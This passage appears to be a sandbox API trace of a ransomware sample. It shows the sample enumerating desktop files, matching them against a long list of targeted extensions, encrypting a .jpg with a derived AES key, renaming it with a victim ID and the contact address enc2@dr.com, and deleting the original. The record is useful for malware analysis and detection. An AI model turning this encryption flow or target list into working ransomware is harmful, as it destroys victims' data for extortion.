returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.487] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.487] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.488] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.489] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x9748, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x9748, lpOverlapped=0x0) returned 1
	[0181.492] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.492] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb088) returned 1
	[0181.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.494] CryptCreateHash (in: hProv=0xfcb088, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0181.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.494] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0181.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.495] CryptDeriveKey (in: hProv=0xfcb088, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0181.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.495] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x9748, dwBufLen=0x9748 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x9750) returned 1
	[0181.496] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.496] RtlMoveMemory (in: Destination=0xfe68d0, Source=0xfdd180, Length=0x9748 | out: Destination=0xfe68d0) 
	[0181.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.497] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe68d0*, pdwDataLen=0x18bc0c*=0x9748, dwBufLen=0x9750 | out: pbData=0xfe68d0*, pdwDataLen=0x18bc0c*=0x9750) returned 1
	[0181.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.499] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0181.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.500] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0181.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.500] CryptReleaseContext (hProv=0xfcb088, dwFlags=0x0) returned 1
	[0181.500] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.501] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.502] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0181.503] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 90
	[0181.503] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0181.504] WriteFile (in: hFile=0x388, lpBuffer=0xfe68d0*, nNumberOfBytesToWrite=0x9750, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe68d0*, lpNumberOfBytesWritten=0x18c068*=0x9750, lpOverlapped=0x0) returned 1
	[0181.508] CloseHandle (hObject=0x388) returned 1
	[0181.508] CloseHandle (hObject=0x384) returned 1
	[0181.509] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg")) returned 1
	[0181.515] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg")) returned 0
	[0181.516] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aadb2a0, ftCreationTime.dwHighDateTime=0x1d96ae3, ftLastAccessTime.dwLowDateTime=0x7c61ab00, ftLastAccessTime.dwHighDateTime=0x1d96cbb, ftLastWriteTime.dwLowDateTime=0x7c61ab00, ftLastWriteTime.dwHighDateTime=0x1d96cbb, nFileSizeHigh=0x0, nFileSizeLow=0xd61e, dwReserved0=0x0, dwReserved1=0x0, cFileName="cXUEzcNf.avi", cAlternateFileName="")) returned 1
	[0181.516] lstrcmpW (lpString1="cXUEzcNf.avi", lpString2="..") returned 1
	[0181.516] lstrcmpW (lpString1="cXUEzcNf.avi", lpString2=".") returned 1
	[0181.516] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.517] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="cXUEzcNf.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\cXUEzcNf.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\cXUEzcNf.avi"
	[0181.517] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\cXUEzcNf.avi") returned 42
	[0181.517] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.517] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\cXUEzcNf.avi", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\cxuezcnf.avi") returned 0x2a
	[0181.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.517] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\cxuezcnf.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.517] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\cxuezcnf.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\cxuezcnf.avi") returned="c:\\users\\rdhj0cnfevzx\\desktop\\cxuezcnf.avi"
	[0181.517] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\cxuezcnf.avi") returned 42
	[0181.518] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.518] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.518] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0181.518] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.518] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0181.518] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21a0a1f0, ftCreationTime.dwHighDateTime=0x1d96f5c, ftLastAccessTime.dwLowDateTime=0x4eb6b970, ftLastAccessTime.dwHighDateTime=0x1d97076, ftLastWriteTime.dwLowDateTime=0x4eb6b970, ftLastWriteTime.dwHighDateTime=0x1d97076, nFileSizeHigh=0x0, nFileSizeLow=0xeba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="D-EFJesBY.pptx", cAlternateFileName="D-EFJE~1.PPT")) returned 1
	[0181.519] lstrcmpW (lpString1="D-EFJesBY.pptx", lpString2="..") returned 1
	[0181.519] lstrcmpW (lpString1="D-EFJesBY.pptx", lpString2=".") returned 1
	[0181.519] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.519] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="D-EFJesBY.pptx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\D-EFJesBY.pptx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\D-EFJesBY.pptx"
	[0181.519] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\D-EFJesBY.pptx") returned 44
	[0181.519] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.519] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\D-EFJesBY.pptx", cchLength=0x2c | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx") returned 0x2c
	[0181.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.520] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.520] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx") returned="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx"
	[0181.520] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx") returned 44
	[0181.520] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.520] StrStrW (lpFirst=".pptx", lpSrch=".") returned=".pptx"
	[0181.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.521] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.